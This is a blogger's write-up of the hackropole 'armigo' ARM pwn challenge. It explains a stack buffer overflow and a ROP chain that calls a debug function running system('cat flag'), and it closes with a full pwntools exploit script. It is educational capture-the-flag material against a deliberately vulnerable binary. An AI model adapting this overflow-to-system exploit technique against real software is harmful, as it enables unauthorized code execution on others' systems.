0xb0tm4n's website

[Pwn] armigo | hackropole


[*] '/home/botman/Documents/cybersec/CTF/solo/hackropole/pwn/armigo/armigo'
    Arch:     arm-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x10000)


So this is yet another ARM pwn challenge ! We begin by open the binary in ghidra and check the main function, firstly we see a bof and then we can see another interesting function called "debug", this one is interesting becauseit's look like it's run some shell commands


So now we can look into debug and yes! it's take the first argument and run system with it


Ok, cool but how can we use this command to get the flag ? We can going to build a really easy ROP with a pop r0 with a command like "/bin/bash" or "cat flag" and then ret to debug no ? Firstly we're gonna check i there is some string who can help us and yes, we can find the string "cat flag" at the address 0x000733fc

cat flag

Ok, so we just have to find a pop instruction and this should be easy because we have a big binary, and yes, it was easy


So, i'm gonna summarize, we have:

  • a pop instruction
  • a "cat flag" string
  • a debug function who run our shell command

so we're juste gonna build our rop like this:

padding + pop + cat_flag + debug

this will pop r0 and lr (which is the "parente return address") and then put "cat flag" in r0 and debug addr in lr, after this there is a "bx lr" instruction which will jmp to our addr.

and here we go, we got the flag


Full exploit

from pwn import *

def exploit(io, elf, libc=None):
    padding = b"A"*68 
    pop = 0x000703c8 # pop {r0, lr}; bx lr;
    cat_flag = 0x000733fc # "cat flag"
    debug = 0x000104d8

    payload = padding + p32(pop) + p32(cat_flag) + p32(debug)

    io.sendlineafter(b'?\n', payload)
    flag = io.recvline().decode('utf-8')
    io.success(f'flag: {flag}')

download here

Writed by 0xB0tm4n